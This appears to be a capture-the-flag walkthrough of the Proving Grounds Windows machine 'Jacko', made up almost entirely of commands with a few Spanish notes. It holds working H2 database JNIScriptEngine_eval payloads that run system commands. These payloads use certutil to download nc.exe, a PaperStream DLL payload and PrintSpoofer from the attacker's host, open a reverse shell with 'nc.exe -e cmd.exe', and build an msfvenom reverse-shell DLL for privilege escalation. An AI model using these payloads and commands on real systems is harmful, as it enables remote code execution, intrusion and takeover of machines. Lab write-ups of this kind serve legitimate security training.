Jacko

Jacko


ProvingGrounds Windows

nmap -A -p- -oA jacko 192.168.199.66 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA jacko 192.168.199.66

nmap -sU -O -p- -oA jacko-udp 192.168.199.66

nikto -h 192.168.199.66:80

ssh_command.

ssh_command.

http://192.168.199.66

ssh_command.

http://192.168.199.66:8082

ssh_command.

searchsploit H2

searchsploit -m 49384.txt

ssh_command.

“JNIScriptEngine.eval”; CALL JNIScriptEngine_eval(‘new java.util.Scanner(java.lang.Runtime.getRuntime().exec(“whoami”).getInputStream()).useDelimiter(“\Z”).next()’);

ssh_command.

ssh_command.

“JNIScriptEngine.eval”; CALL JNIScriptEngine_eval(‘new java.util.Scanner(java.lang.Runtime.getRuntime().exec(“certutil -urlcache -f -split http://192.168.49.199/nc.exe C:/Users/tony/nc.exe”).getInputStream()).useDelimiter(“\Z”).next()’);

“JNIScriptEngine.eval”; CALL JNIScriptEngine_eval(‘new java.util.Scanner(java.lang.Runtime.getRuntime().exec(” C:/Users/tony/nc.exe 192.168.49.199 445 -e cmd.exe”).getInputStream()).useDelimiter(“\Z”).next()’);

ssh_command.

type local.txt

ssh_command.

set PATH=%SystemRoot%\system32;%SystemRoot%;

ssh_command.

Vamos a Program Files (x86) y vemos PaperStream IP

ssh_command.

https://www.exploit-db.com/exploits/49832

msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.199 LPORT=135

searchsploit paperstream

searchsploit -m 49382.ps1

ssh_command.

dir “\powershell.exe” \s

ssh_command.

Vemos donde esta el powershell y lo corremos

ssh_command.

type “C:\Program files (x86)\PaperStream IP\TWAIN\readmeenu.rtf”

ssh_command.

certutil -urlcache -f -split http://192.168.49.199/PrintSpoofer.exe C:/Users/tony/print.exe

ssh_command.

https://github.com/dievus/printspoofer

python3 -m http.server 80

ssh_command.

“JNIScriptEngine.eval”; CALL JNIScriptEngine_eval(‘new java.util.Scanner(java.lang.Runtime.getRuntime().exec(“certutil -urlcache -f -split http://192.168.49.199/UninOldIS.dll C:/Users/tony/UninOldIS.dll “).getInputStream()).useDelimiter(“\Z”).next()’);

“JNIScriptEngine.eval”; CALL JNIScriptEngine_eval(‘new java.util.Scanner(java.lang.Runtime.getRuntime().exec(“certutil -urlcache -f -split http://192.168.49.199/49382.ps1 C:/Users/tony/49382.ps1 “).getInputStream()).useDelimiter(“\Z”).next()’);

ssh_command.

nc -lvnp 135

ssh_command.

ssh_command.

© 2025 Cu3rv0x